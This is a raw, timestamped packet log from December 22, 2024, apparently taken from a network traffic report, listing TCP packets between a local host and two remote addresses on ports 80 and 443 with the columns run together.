                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.645025969 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.645096064 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.645153999 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.645270109 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.645287037 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.645330906 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.645330906 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.645421982 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.645528078 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.645571947 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.645850897 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.645894051 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.794949055 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.794977903 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.794992924 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795001030 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795021057 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795027971 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795217037 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795259953 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795325041 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795341015 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795363903 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795382977 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795526028 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795562983 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795713902 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795789957 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795794964 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795814037 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795834064 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.795844078 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.796009064 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.796044111 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.796506882 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.796542883 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.796559095 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.796576023 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.796596050 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.796611071 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.796987057 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.797039986 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.797082901 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.797100067 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.797138929 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.797300100 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.797338963 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.797832966 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.797893047 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.797916889 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.797933102 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.797996044 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.798139095 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.798190117 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.798662901 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.798679113 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.798695087 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.798719883 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.798749924 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.798932076 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.799357891 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.799407005 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.799442053 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.799458027 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.799501896 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.799714088 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.799762011 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.800169945 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.800237894 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.800254107 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.800282955 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.800298929 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.800455093 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.800503016 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.800930977 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.800978899 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.801044941 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.801060915 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.801084995 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.801096916 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.801249981 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.801307917 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.801716089 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.801789045 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.801794052 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.801811934 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.801855087 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.802021980 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.802087069 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.802511930 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.802563906 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.802589893 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.802608967 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.802628994 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.802653074 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.802829027 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.802918911 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.803298950 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.803339005 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.803395987 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.803412914 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.803453922 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.803642988 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.803792000 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.804116964 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.804181099 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.804188967 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.804198980 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.804214001 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.804235935 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.804409981 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.804450035 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.804950953 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.804966927 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.804982901 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.804991007 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.805016994 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.805181026 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.805207968 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.805219889 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.805665016 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.805711985 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.805725098 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.805742025 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.805767059 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.805778027 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.806018114 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.806063890 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.806469917 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.806504965 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.806520939 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.806546926 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.806579113 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.806725025 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.807257891 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.807290077 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.807306051 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.807306051 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.807332039 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.807356119 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.807519913 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.807566881 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.808033943 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.808077097 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.808078051 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.808094025 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.808116913 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.808134079 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.808309078 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.808638096 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.808806896 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.808860064 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.808876038 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.808897018 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.808923960 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.809097052 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.809174061 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.809587955 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.809639931 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.809648037 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.809663057 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.809688091 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.809699059 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.809912920 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.809969902 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.810383081 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.810431004 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.810456991 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.810472965 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.810497999 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.810511112 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.810679913 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.810755968 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.811130047 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.811181068 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.811244965 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.811261892 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.811306000 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.811466932 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.811929941 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.811979055 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.812025070 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.812041998 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.812066078 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.812093019 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.812277079 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.812319040 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.812753916 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.812794924 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.812807083 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.812824965 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.812844038 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.812863111 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.813035011 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.813076973 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.813560963 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.813621044 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.813635111 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.813643932 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.813682079 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.829943895 CET49885443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.829976082 CET44349885104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.830077887 CET49885443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.830493927 CET49885443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.830502987 CET44349885104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.837256908 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.837271929 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.837286949 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.837301970 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.837315083 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.837336063 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.837398052 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.837435007 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.837553978 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.837570906 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.837589979 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.837603092 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.837999105 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.838037014 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.838076115 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.838130951 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.987241983 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.987268925 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.987287045 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.987309933 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.987360954 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.987400055 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.987430096 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.987447023 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.987492085 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.987627983 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.987669945 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.987828016 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.987921000 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.987936974 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.987958908 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.987987041 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.988147020 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.988626957 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.988673925 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.988734007 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.988749981 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.988790989 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.988950014 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.988993883 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.989392996 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.989492893 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.989509106 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.989542961 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.989568949 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.989706039 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.990190029 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.990242958 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.990287066 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.990303040 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.990345955 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.990730047 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.990771055 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.990999937 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.991050005 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.991074085 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.991091013 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.991214991 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.991323948 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.991408110 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.991821051 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.991864920 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.991926908 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.991942883 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.991969109 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.991981030 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.992140055 CET804987231.41.244.11192.168.2.4
